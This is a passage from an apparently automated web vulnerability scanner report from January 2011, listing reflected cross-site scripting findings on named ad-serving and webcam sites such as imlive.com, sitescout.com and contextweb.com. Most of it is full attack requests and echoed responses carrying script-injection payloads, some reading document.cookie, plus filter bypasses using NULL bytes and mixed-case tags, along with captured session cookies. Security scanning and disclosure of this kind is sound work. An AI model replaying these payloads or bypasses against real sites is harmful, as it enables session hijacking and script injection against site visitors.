GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=9e4ea'%3balert(1)//c6fa5b63d0&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiWidth request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fca5'%3balert(1)//6b02666133 was submitted in the oggiWidth parameter. This input was echoed as 4fca5';alert(1)//6b02666133 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px4fca5'%3balert(1)//6b02666133&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiWidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c3e"%3balert(1)//0b5372e35f5 was submitted in the oggiWidth parameter. This input was echoed as 60c3e";alert(1)//0b5372e35f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px60c3e"%3balert(1)//0b5372e35f5&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function Initbc98c806_2c1e_48b1_9d3c_28ad71063ff3(){ var playerDiv = document.createElement("div"); playerDiv.id = 'oggiPlayerDivbc98c806_2c1e_48b1_9d3c_28ad71063ff3'; playerDiv.setAttribute( ...[SNIP]... <div id='oggiPlaceholderbc98c806_2c1e_48b1_9d3c_28ad71063ff3' style='width:300px60c3e";alert(1)//0b5372e35f5;height:250px;'> ...[SNIP]...
4.727. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9277'-alert(1)-'48bfaebef6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e9277'-alert(1)-'48bfaebef6a=1 HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/?e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&iy=dallas&id=44&iu=1&vd=591f9b95-a40e-412c-8b3f-904dd62e2a06';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.728. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba898"><script>alert(1)</script>ea1f44e02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba898"><script>alert(1)</script>ea1f44e02c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%00ba898"><script>alert(1)</script>ea1f44e02c1=1 HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a0cf'onerror%3d'alert(1)'9653cda9fbc was submitted in the gotopage parameter. This input was echoed as 8a0cf'onerror='alert(1)'9653cda9fbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/8a0cf'onerror%3d'alert(1)'9653cda9fbc HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iru=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQSQQASC=MBDGAJMAPJDFGCLMLOHPEKEG; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:28 GMT Connection: close Content-Length: 8316 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
4.730. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955da'-alert(1)-'35a7f28024d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?955da'-alert(1)-'35a7f28024d=1 HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=se.imlive.com&ul=/?955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&iy=dallas&id=44&iu=1&vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.731. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13=1 HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50044'onerror%3d'alert(1)'c69d85712e5 was submitted in the gotopage parameter. This input was echoed as 50044'onerror='alert(1)'c69d85712e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=50044'onerror%3d'alert(1)'c69d85712e5 HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:34 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ise=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRSRDRD=OMEHEKMACGAIHNLGCDDKMGHM; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:34 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e82fb'%3balert(1)//18af4187165 was submitted in the h parameter. This input was echoed as e82fb';alert(1)//18af4187165 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=79C8ECB&w=300&h=250e82fb'%3balert(1)//18af4187165&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 822 Date: Fri, 28 Jan 2011 17:00:30 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498fa"%3balert(1)//6c93725137d was submitted in the pid parameter. This input was echoed as 498fa";alert(1)//6c93725137d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=79C8ECB498fa"%3balert(1)//6c93725137d&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 822 Date: Fri, 28 Jan 2011 17:00:26 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://smm.sitescout.com/disp?pid=79C8ECB498fa";alert(1)//6c93725137d&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBA ...[SNIP]...
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca607'%3balert(1)//e817e7d55a9 was submitted in the w parameter. This input was echoed as ca607';alert(1)//e817e7d55a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=79C8ECB&w=300ca607'%3balert(1)//e817e7d55a9&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 822 Date: Fri, 28 Jan 2011 17:00:28 GMT Connection: close
4.736. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://syndication.mmismm.com
Path:
/mmtnt.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf279'%3balert(1)//9e11ad01c81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf279';alert(1)//9e11ad01c81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mmtnt.php?bf279'%3balert(1)//9e11ad01c81=1 HTTP/1.1 Host: syndication.mmismm.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: G=10120000000990801741
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:39:45 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV" Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 07:39:45 GMT; path=/; domain=.mmismm.com Content-Length: 493 Content-Type: text/javascript
The value of the action request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7085a%3balert(1)//2098f28910d was submitted in the action parameter. This input was echoed as 7085a;alert(1)//2098f28910d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD7085a%3balert(1)//2098f28910d&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151\ HTTP/1.1 Host: tag.contextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: FC1-WC=^54144_2_2hYC9; C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cr=405|2|-8589049292256662518|1; 513102_300X250_50151=1/28/2011 12:37:49 PM; V=gFEcJzqCjXJj; vf=1; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cw=cw;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB26 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: -891921703 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4887 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:41:02 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0018ba5"%3balert(1)//19729ceb402 was submitted in the action parameter. This input was echoed as 18ba5";alert(1)//19729ceb402 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD%0018ba5"%3balert(1)//19729ceb402&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
